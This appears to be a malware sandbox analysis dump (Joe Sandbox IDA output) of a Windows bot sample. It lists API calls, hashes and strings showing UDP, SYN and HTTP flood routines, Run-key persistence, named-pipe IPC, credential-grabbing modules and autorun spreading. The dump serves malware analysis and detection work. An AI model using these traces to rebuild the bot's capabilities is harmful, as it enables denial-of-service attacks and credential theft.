                                                                  • Opcode Fuzzy Hash: 2ed69a3993d2c152394e42fa77ab4c94001d30c3665b2c2998835b9ce7c447a5
                                                                  • Instruction Fuzzy Hash: AB518A71A00245ABD722DF59ED84BEA77ECEB88700F04867EE908DB290D7709945CF95
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(003E3634,00000000,00000001,003E3614,?), ref: 003DEE5B
                                                                  • memset.MSVCRT(?,00000000,00000207), ref: 003DEE81
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DEE9A
                                                                  • lstrcatA.KERNEL32(00000000,003E2C78), ref: 003DEEAE
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 003DEEBB
                                                                  • memset.MSVCRT(?,00000000,0000015C), ref: 003DEED5
                                                                  • SHGetFileInfoA.SHELL32(?,00000000,00000000,00000160,00001000), ref: 003DEEF4
                                                                  • memset.MSVCRT(?,00000000,00000107), ref: 003DEF68
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DEF7B
                                                                  • lstrcatA.KERNEL32(00000000,.lnk), ref: 003DEF89
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003DEFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatmemset$lstrcpy$ByteCharCreateFileInfoInstanceMultiWide
                                                                  • String ID: .lnk$shell32.dll
                                                                  • API String ID: 3196525290-3399515747
                                                                  • Opcode ID: 7a6449aa8b09d6bd2bf3cec2d0f4304fedd0933a898fe0be89b673b6a8d21f5d
                                                                  • Instruction ID: 5463c1652e749f277797f16eb2b89de6a52ada2ce9d29776e872d601c4e77962
                                                                  • Opcode Fuzzy Hash: 7a6449aa8b09d6bd2bf3cec2d0f4304fedd0933a898fe0be89b673b6a8d21f5d
                                                                  • Instruction Fuzzy Hash: 63514075A00258AFDB55DB94CC85FDAB3BCAF8C700F104698F608EB2D0D6B0AE45CB64
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003D2243
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 003D2257
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • htons.WS2_32(00000050), ref: 003D2288
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003D2297
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 003D22AE
                                                                  • GetTickCount.KERNEL32 ref: 003D22C3
                                                                  • GetTickCount.KERNEL32 ref: 003D22F4
                                                                  • GetTickCount.KERNEL32 ref: 003D2307
                                                                  • send.WS2_32(00000000,00000000,00000400,00000000), ref: 003D2344
                                                                  • GetTickCount.KERNEL32 ref: 003D2350
                                                                  • closesocket.WS2_32(00000000), ref: 003D2363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupclosesocketconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                  • String ID: gfff$i.root-servers.org
                                                                  • API String ID: 99835129-3534201491
                                                                  • Opcode ID: e1487b2a81e42798eea6ce5c2a78ab008f2a6f44adf2ce762e4aa053aa18dad8
                                                                  • Instruction ID: 5f7dfedf731dc991d9b78886d0a81204c78373367e112818497849a9339cfeae
                                                                  • Opcode Fuzzy Hash: e1487b2a81e42798eea6ce5c2a78ab008f2a6f44adf2ce762e4aa053aa18dad8
                                                                  • Instruction Fuzzy Hash: 88314EB3B0021857DB1AD66DAC427BFB2698F94710F444676FA0CEB3C0E9B49D4147D6
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003D9850
                                                                  • strtok.MSVCRT(?,003E29EC), ref: 003D986E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D988B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 003D98A8
                                                                  • strtok.MSVCRT(00000000,003E29EC), ref: 003D98B5
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D98D1
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D999C
                                                                  Strings
                                                                  • [UDP]: Finished flood on "%s:%d", xrefs: 003D9970
                                                                  • [UDP]: Starting flood on "%s:%d" for %d second(s), xrefs: 003D993A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [UDP]: Finished flood on "%s:%d"$[UDP]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-2644890838
                                                                  • Opcode ID: 5e17c38109a90a1f93c0ac666748f1b4b176a2d0b6450c772f9fec0c7271ad70
                                                                  • Instruction ID: ed51031e9849e3ccac9d697ed01251682ca186f06f811a69abf6e79bb38495a0
                                                                  • Opcode Fuzzy Hash: 5e17c38109a90a1f93c0ac666748f1b4b176a2d0b6450c772f9fec0c7271ad70
                                                                  • Instruction Fuzzy Hash: 6731ECF35402986BD722A7A1BC86FAB336CEB84705F04426EFF089A2C1D6719D148766
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003D96D0
                                                                  • strtok.MSVCRT(?,003E29EC), ref: 003D96EE
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D970B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 003D9728
                                                                  • strtok.MSVCRT(00000000,003E29EC), ref: 003D9735
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D9751
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D981C
                                                                  Strings
                                                                  • [SYN]: Starting flood on "%s:%d" for %d second(s), xrefs: 003D97BA
                                                                  • [SYN]: Finished flood on "%s:%d", xrefs: 003D97F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [SYN]: Finished flood on "%s:%d"$[SYN]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-3475151101
                                                                  • Opcode ID: 64d7b8244fbfdc1afa4d47cb7060f5ba771a40b01b51bcfd978bc403f22fd462
                                                                  • Instruction ID: 0b51aa73500d7dadcedef1ebff83c5d6c2a860ee5eabf3a50e5a962dfd4ef995
                                                                  • Opcode Fuzzy Hash: 64d7b8244fbfdc1afa4d47cb7060f5ba771a40b01b51bcfd978bc403f22fd462
                                                                  • Instruction Fuzzy Hash: 7F31EAB35403986BD732A7A1BC86FBB336CEB45705F04427AFF099A2C1D6709D1486A5
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 003E0C89
                                                                  • GetModuleFileNameA.KERNEL32(00000000,0041AA28,00000104), ref: 003E0C9F
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0041A710,00000208), ref: 003E0CB0
                                                                  • GetWindowsDirectoryA.KERNEL32(0041AB30,00000104), ref: 003E0CC0
                                                                    • Part of subcall function 003D19F0: wcsrchr.MSVCRT(?,0000005C,?,003D6965,?,?,?), ref: 003D19F9
                                                                  • InitializeCriticalSection.KERNEL32(0041AC34), ref: 003E0CE3
                                                                  • InitializeCriticalSection.KERNEL32(0041B4E4), ref: 003E0CEA
                                                                  • MoveFileExW.KERNEL32(0041A710,00000000,00000004), ref: 003E0DA5
                                                                    • Part of subcall function 003DA150: memset.MSVCRT(?,00000000,00000206,?), ref: 003DA170
                                                                    • Part of subcall function 003DA150: GetWindowsDirectoryW.KERNEL32(?,00000208,?,?,?), ref: 003DA184
                                                                    • Part of subcall function 003DA150: _memicmp.MSVCRT(?,?,00000000,?,00000000,?,?,?), ref: 003DA1C3
                                                                  • SetFileAttributesW.KERNEL32(0041A710,00000080), ref: 003E0D96
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E9F0,00000000,00000000,00000000), ref: 003E0DED
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003E0DF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$CriticalDirectoryInitializeModuleNameSectionWindows$AttributesCloseCreateHandleHeapMoveProcessThread_memicmpmemsetwcsrchr
                                                                  • String ID: %s.%S$brk$ruskill
                                                                  • API String ID: 2870590860-2269373653
                                                                  • Opcode ID: d22853357a2bb9a239e8f1cef5611cc4b6f43c9142a50b94bb1dc212138b57d0
                                                                  • Instruction ID: 2e78a9ac1921c193e5319e523ebe6c311dcbf9479bd37a7e1dc8858157051011
                                                                  • Opcode Fuzzy Hash: d22853357a2bb9a239e8f1cef5611cc4b6f43c9142a50b94bb1dc212138b57d0
                                                                  • Instruction Fuzzy Hash: CB3128357813D0B7D33367A26D4BFDA37A89B00B54F140222F601E92D1D7F4A491875B
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003DA89E
                                                                    • Part of subcall function 003D7790: memset.MSVCRT(?,00000000,00000103), ref: 003D77AE
  • Part of subcall function 003D7790: memset.MSVCRT(?,00000000,000001FF,?,00000000,00000103), ref: 003D77C8
  • Part of subcall function 003D7790: lstrcpyA.KERNEL32(00000000,off), ref: 003D77F0
  • Part of subcall function 003D7790: _snprintf.MSVCRT(00000000,000001FF,state_%s,?), ref: 003D780D
  • Part of subcall function 003D7790: lstrlenA.KERNEL32(00000000), ref: 003D7822
  • Part of subcall function 003D7790: lstrlenA.KERNEL32(00000000), ref: 003D7858
• _snprintf.MSVCRT(00000000,000001FF,003E2B10,00000539,httpi,00000001,usbi,00000000,bdns,00000001), ref: 003DA936
  • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D752B
  • Part of subcall function 003D7500: _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D7547
  • Part of subcall function 003D7500: _vsnprintf.MSVCRT(?,000001FF,00000000,?), ref: 003D7569
  • Part of subcall function 003D7500: lstrcmpA.KERNEL32(?,bdns), ref: 003D758B
  • Part of subcall function 003D7500: StrStrIA.SHLWAPI(?,00000000), ref: 003D759F
  • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D75B9
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: lstrlen$_snprintfmemset$_vsnprintflstrcmplstrcpy
• String ID: bdns$ffgrab$ftpgrab$http$httpi$iegrab$int$msg$msn$msnu$pdef$popgrab$usbi
• API String ID: 3955240783-2907616027
• Opcode ID: 6ba83768f0b55d604ead61096c6d4135037e6175cd0badda21b470dc3cf6a476
• Instruction ID: a4cf55d3f2a2ea91c3ca83e30221de93a6b6186e5156a58b4db5ef39b4babbd2
• Opcode Fuzzy Hash: 6ba83768f0b55d604ead61096c6d4135037e6175cd0badda21b470dc3cf6a476
• Instruction Fuzzy Hash: 3A115FB9BE93A775E663B6A26CC3FF922194B40F04F400755F1087D2C2BAF12550C166
APIs
• memset.MSVCRT(?,00000000,00000103), ref: 003D180E
• memset.MSVCRT(?,00000000,00000206,?,00000000,00000103), ref: 003D1829
• wcsstr.MSVCRT(00000000,003E13F0), ref: 003D1842
• lstrcmpA.KERNEL32(00000000,block), ref: 003D1888
• strstr.MSVCRT(00000000,003E13D8), ref: 003D1898
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000208), ref: 003D18B7
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 003D1905
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: ByteCharMultiWidememset$lstrcmpstrstrwcsstr
• String ID: %s.%S$bdns$block$brk$rdns
• API String ID: 695720605-4000218262
• Opcode ID: 9963e2cd05c55f07b419160d30b621fdf84b9b5d78b737c8ed0f2706ab9d5c27
• Instruction ID: d193794f454b3ba2c796856561971b94640f0664144e8ee808b827d66e23f738
• Opcode Fuzzy Hash: 9963e2cd05c55f07b419160d30b621fdf84b9b5d78b737c8ed0f2706ab9d5c27
• Instruction Fuzzy Hash: 18511676A00254BBDB22DB55FC56FEB37AC9B95710F04422AF900A62C1E7B0DA45C7E2
APIs
• memset.MSVCRT(?,00000000,00000103), ref: 003D10C0
• lstrcmpW.KERNEL32(?,0041ADA0), ref: 003D10D7
• lstrcmpW.KERNEL32(?,0041A710), ref: 003D111D
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 003D1127
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 003D1161
• lstrcpyA.KERNEL32(003E6D88,00000000), ref: 003D1179
• lstrcpyA.KERNEL32(00000000,003E1335), ref: 003D1187
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 003D11A0
• lstrcpyA.KERNEL32(003E6E90,00000000), ref: 003D11B3
  • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
  • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
  • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: lstrcpy$ByteCharMultiWidelstrcmpmemset$FileMove_snprintflstrlen
• String ID: %s.%S$pdef$ruskill
• API String ID: 1230166232-1410347113
• Opcode ID: 9613b678889bf7240efcfa66a3f445c7d47a4bba33136c21d06312e3340ae8d4
• Instruction ID: 499aa9c500a3b36d0c8946992fe96e0a89d9a3edfc391df39a97d3b45b8056b8
• Opcode Fuzzy Hash: 9613b678889bf7240efcfa66a3f445c7d47a4bba33136c21d06312e3340ae8d4
• Instruction Fuzzy Hash: 2531F8B6740368BBE7329755AC82FEA736CDB95B10F000256FB54AA2C1D7F0ED80C665
APIs
• memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
• memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
• lstrlenA.KERNEL32(?), ref: 003D7431
• _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
• _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
• lstrlenA.KERNEL32(?), ref: 003D747A
• _memicmp.MSVCRT(?,block,00000004), ref: 003D74B0
• _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D74D0
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: _vsnprintflstrlenmemset$_memicmp_snprintf
• String ID: %s.%s$%s_$blk$block
• API String ID: 3657324510-3589362310
• Opcode ID: bd15c963fcb5d3e21bb0a559a50114939e49fd2e52f2edfb6e9a3c463ee44b6a
• Instruction ID: 1ac1fb0a4cbb6b3c68503304d4c3ce05e8bde89dc2f058cfd1a51b55fed65e93
• Opcode Fuzzy Hash: bd15c963fcb5d3e21bb0a559a50114939e49fd2e52f2edfb6e9a3c463ee44b6a
• Instruction Fuzzy Hash: B421327794025D7BE712EA59DC82FFB336CDB84704F4445B9FA08971C1F5709E4586A0
APIs
• memset.MSVCRT ref: 003D95A4
• memset.MSVCRT(?,00000000,000007FF), ref: 003D95BE
• memset.MSVCRT(?,00000000,00000103,?,00000000,000007FF), ref: 003D95D8
• GetTickCount.KERNEL32 ref: 003D95E0
• lstrcpyA.KERNEL32(?,Mozilla/4.0), ref: 003D9611
• lstrcpyA.KERNEL32(?,GET), ref: 003D9664
• sprintf.MSVCRT(?,%s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42,?,?,?,?), ref: 003D9685
• strtok.MSVCRT(?,003E2960,?,%s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42,?,?,?,?), ref: 003D9696
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: memset$lstrcpy$CountTicksprintfstrtok
• String ID: %s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42$GET$Mozilla/4.0$POST
• API String ID: 3318893083-109246470
• Opcode ID: cf6dce72a8d604e4193ff0e49373804575b3d4ebc25db8e21539f0a00fb59f72
• Instruction ID: e155546091234263bd9d973c1a068e587a5d4d2bce8d9a5a6c63011f5404cecd
• Opcode Fuzzy Hash: cf6dce72a8d604e4193ff0e49373804575b3d4ebc25db8e21539f0a00fb59f72
• Instruction Fuzzy Hash: BE213CB394026C6AC72AD7A5DC42FDA736C9FA8710F0002D6F308A61C1D6F0ABC48B61
APIs
• GetTickCount.KERNEL32 ref: 003D8292
• GetTickCount.KERNEL32 ref: 003D82A8
  • Part of subcall function 003D81C0: WSAStartup.WS2_32(00000202,?), ref: 003D81E3
• select.WS2_32(00000000,00000000,?,00000000,?), ref: 003D8314
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: CountTick$Startupselect
• String ID:
• API String ID: 3882035529-0
• Opcode ID: bbbf393a0ce9e7867f753e0a0be6096e767544ff1cc0112dc383b26e13626a15
• Instruction ID: cb74252ced52cfcf20321cd10b7fac8ccb64b26d276e80b2b5e47e2c750a3848
• Opcode Fuzzy Hash: bbbf393a0ce9e7867f753e0a0be6096e767544ff1cc0112dc383b26e13626a15
• Instruction Fuzzy Hash: 44A1D8B2900604ABC735DF69E881AEBB3F9EF45310F00455FE69987341EB74BD858BA1
APIs
• memset.MSVCRT(?,00000000,000003FE), ref: 003D6F91
• lstrcpyA.KERNEL32(00000000,HKCU\), ref: 003D6FFE
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 003D7017
• _wcsnicmp.MSVCRT(?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,Software\Microsoft\Windows\CurrentVersion\Run), ref: 003D7061
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: ByteCharMultiWide_wcsnicmplstrcpymemset
• String ID: %S%s%s$%s.%s%s$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
• API String ID: 2911520168-3007424447
• Opcode ID: 6e13b4f4884e5c4ba30915d86e5fb5ba8bbc9e1b9047c59211ed14095e876218
• Instruction ID: 9ff99ca7312b98e578bb6d9290a9685462b5f6b13f88594a6a7efd1e7c8d5cf5
• Opcode Fuzzy Hash: 6e13b4f4884e5c4ba30915d86e5fb5ba8bbc9e1b9047c59211ed14095e876218
• Instruction Fuzzy Hash: D441A4B2A40218BBCB11DB95EC42EEE77BCEB58710F04025AF904E62C1F674D95087A5
APIs
• memset.MSVCRT(?,00000000,000003FF), ref: 003DE8A0
• lstrlenA.KERNEL32(30e44aa1), ref: 003DE8AD
• _snprintf.MSVCRT(00000000,00000400,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000), ref: 003DE8D0
• CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 003DE8FF
• ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 003DE913
• GetLastError.KERNEL32 ref: 003DE91D
• CreateThread.KERNEL32(00000000,00000000,Function_0000D7A0,00000000,00000000,00000000), ref: 003DE941
• CloseHandle.KERNEL32(00000000), ref: 003DE94B
• CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 003DE96E
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: CreateNamedPipe$CloseConnectErrorHandleLastThread_snprintflstrlenmemset
• String ID: 30e44aa1$\\.\pipe\%08x_ipc
• API String ID: 4065143564-1096776489
• Opcode ID: 659c0b8b4a7ef878524e7979d1f304078170696f029056138cd0a4609e981ea2
• Instruction ID: 143eddb63e5bc85f432b57de9d5468973cd75d1d58dd70d0471fecf69cf9c3e3
• Opcode Fuzzy Hash: 659c0b8b4a7ef878524e7979d1f304078170696f029056138cd0a4609e981ea2
• Instruction Fuzzy Hash: 4F210272BC03257AF33266745C87FAA7A5CAB14F20F644761FB04FE1C0DAF069044AA8
APIs
• memset.MSVCRT(?,00000000,00000206), ref: 003D7121
• lstrcpyW.KERNEL32(?,HKCU\), ref: 003D7172
• _wcsnicmp.MSVCRT(?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,Software\Microsoft\Windows\CurrentVersion\Run), ref: 003D71A8
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: _wcsnicmplstrcpymemset
• String ID: %S%S%S$%s.%S%S$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
• API String ID: 1531173107-4065158899
• Opcode ID: 6d801e1912f05fd69a2fb6e4f30cd94c3e4d3fc64c2177a69bdaedefdabd5b1f
• Instruction ID: 2314ad9b4b568240370ebe02f0cccffb94680be584ab02e2ef2a175a7488fa9d
• Opcode Fuzzy Hash: 6d801e1912f05fd69a2fb6e4f30cd94c3e4d3fc64c2177a69bdaedefdabd5b1f
• Instruction Fuzzy Hash: 1C31F677A413647ACB12DE45AC86EEB337CEB98710F000756FD05A2282F6B0ED9086B5
APIs
  • Part of subcall function 003D19F0: wcsrchr.MSVCRT(?,0000005C,?,003D6965,?,?,?), ref: 003D19F9
  • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
  • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
  • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
• strstr.MSVCRT(003E6E90,.exe,?,?,?,?), ref: 003D69A8
• lstrcmpA.KERNEL32(003E6D88,0041AC50,?,?,?,?,?,?), ref: 003D69BE
• SetFileAttributesA.KERNEL32(003E6E90,00000080,?,?,?,?,?,?), ref: 003D69D2
• DeleteFileA.KERNEL32(003E6E90,?,?,?,?,?,?), ref: 003D69DD
• MoveFileExA.KERNEL32(003E6D88,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT),?,?,?,?,?,?), ref: 003D69EC
  • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA335
  • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA34F
  • Part of subcall function 003DA310: memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
  • Part of subcall function 003DA310: _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
  • Part of subcall function 003DA310: sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
  • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
  • Part of subcall function 003DA310: _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
  • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
  • Part of subcall function 003DA310: sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
  • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
  • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
  • Part of subcall function 003DA310: EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
  • Part of subcall function 003DA310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
  • Part of subcall function 003DA310: LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
Strings
• pdef, xrefs: 003D6986
• .exe, xrefs: 003D699C
• autorun.inf, xrefs: 003D6970
• %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!, xrefs: 003D6A06
• %s.Blocked "%S" from creating "%S", xrefs: 003D6A24
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: lstrlen$Filememset$CriticalSection_snprintfsprintf$AttributesCreateDeleteEnterLeaveMove_vsnprintflstrcmpstrstrwcsrchr
• String ID: %s.Blocked "%S" from creating "%S"$%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!$.exe$autorun.inf$pdef
• API String ID: 2285763329-814828592
• Opcode ID: e2030dddc11c317dfff728f730d4b57876c02e23b4e2f50e824d95959226057d
• Instruction ID: c3958af0b9aca17592deeba6bf6c07debcaa09ba6a987e84bc23d056b579c5d6
• Opcode Fuzzy Hash: e2030dddc11c317dfff728f730d4b57876c02e23b4e2f50e824d95959226057d
• Instruction Fuzzy Hash: 2011CB7BBC03A032DA2326D63C47FDF32494BA1FA5F054226FD54F53C2DAA1E95041A2
APIs
• WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003D3DA4
• ReadFile.KERNEL32(?,-003E7960,00000800,00000000,?,?,?,00000000,000000FF), ref: 003D3DFF
• GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 003D3E3E
• ReadFile.KERNEL32(?,003E7960,00000800,00000000,?), ref: 003D3ED7
• GetLastError.KERNEL32 ref: 003D3EE3
• GetLastError.KERNEL32 ref: 003D3EEA
• GetLastError.KERNEL32 ref: 003D3EF3
• DisconnectNamedPipe.KERNEL32(?), ref: 003D3F68
• ConnectNamedPipe.KERNEL32(?), ref: 003D3F7E
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: ErrorLast$FileNamedPipeRead$ConnectDisconnectMultipleObjectsOverlappedResultWait
• String ID:
• API String ID: 4113577031-0
• Opcode ID: 2edbaf7844ecdb1393fe1ea98fe36e80b8307205f877c132f39058dd0b12e1e6
• Instruction ID: efd401a2cf9efd9dd044f2cd8b8d8ff8372752d231d4431fe7bb97ba6ea69f39
